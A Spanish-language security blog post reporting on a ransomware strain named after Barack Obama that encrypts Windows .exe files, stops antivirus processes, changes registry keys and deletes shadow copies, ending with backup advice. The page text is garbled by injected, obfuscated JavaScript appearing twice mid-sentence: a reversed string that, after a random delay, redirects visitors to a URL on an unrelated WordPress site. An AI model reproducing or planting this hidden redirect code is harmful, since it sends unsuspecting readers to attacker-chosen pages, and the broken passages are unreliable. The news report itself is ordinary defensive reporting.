Nuevo Ransomware Obama encripta archivos .exe
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok=40AkuCIY” width=”855″ height=”570″ /><br />
barack obama</p>
<p>Un equipo de investigadores de seguridad de MalwareHunterTeam ha descubier<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to un nuevo ransomware llamado Barack Obama’s Everlasting Blue Blackmail Virus, un malware que encripta los ficheros .exe de los ordenadores Windows y pide a la víctima un rescate.
A diferencia del año pasado, cuando WannaCry hizo saltar las alarmas de todo el mundo, en 2018 el ransomware no ocupa habitualmente las portadas de los medios. Sin embargo, esto no quiere decir que este tipo de malware haya sido erradicado, y en nuestros días se siguen produciendo infinidad de infecciones.
En nuestro país, de acuerdo con los responsables del Departamento de Delitos Telemáticos de la Unidad Central Operativa (UCO) de la Guardia Civil, los ciberdelincuentes dirigen los ataques de ransomware especialmente contra las pequeñas y medianas empresas porque son las víctimas que habitualmente suelen pagar el rescate.
Aunque se desconoce exactamente cuál es el método de distribución de este nuevo ransomware, los investigadores creen que probablemente sea a través de campañas de spam y phishing.
Una vez instalado en el ordenador Windows, en primer lugar analiza el sistema infectado para detectar y finalizar los procesos asociados con los programas antivirus, con la finalidad de no ser descubierto. A continuación, escanea el sistema en busca de archivos .exe para encriptarlos, incluso los que se encuentran en la carpeta de Windows.
Además, como parte del proceso de cifrado, el malware también modifica las claves del registro asociadas con los ficheros .exe, de manera que muestren un nuevo icono y ejecuten el ransomware cada vez que alguien los ejecute. El virus de Barack Obama también borra todas las copias del Volume Shadow Copy Service, de forma que se hace más complicado recuperar los archivos.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok=CTAVa37R” width=”769″ height=”529″ /><br />
ransomware obama</p>
<p>Una vez terminado el cifrado del ordenador de la víctima, el ransomware muestra una fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tografía de Barack Obama y un mensaje que indica que el ordenador ha sido secuestrado. No indica la cantidad que hay que pagar para poder recuperar el control del equipo, pero sí deja claro que hay que pagar un rescate, y facilita un correo electrónico para que la víctima pueda contactar.
Si eres víctima de ransomware, los expertos en seguridad recomiendan no pagar el rescate bajo ningún concepto, ya que esto no asegura que los atacantes te vayan a devolver el control de tu ordenador. Lo mejor para combatir este tipo de virus es guardar copias de seguridad de tu equipo en un lugar seguro y hacer los backups periódicamente.
Ver información original al respecto en Fuente:
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.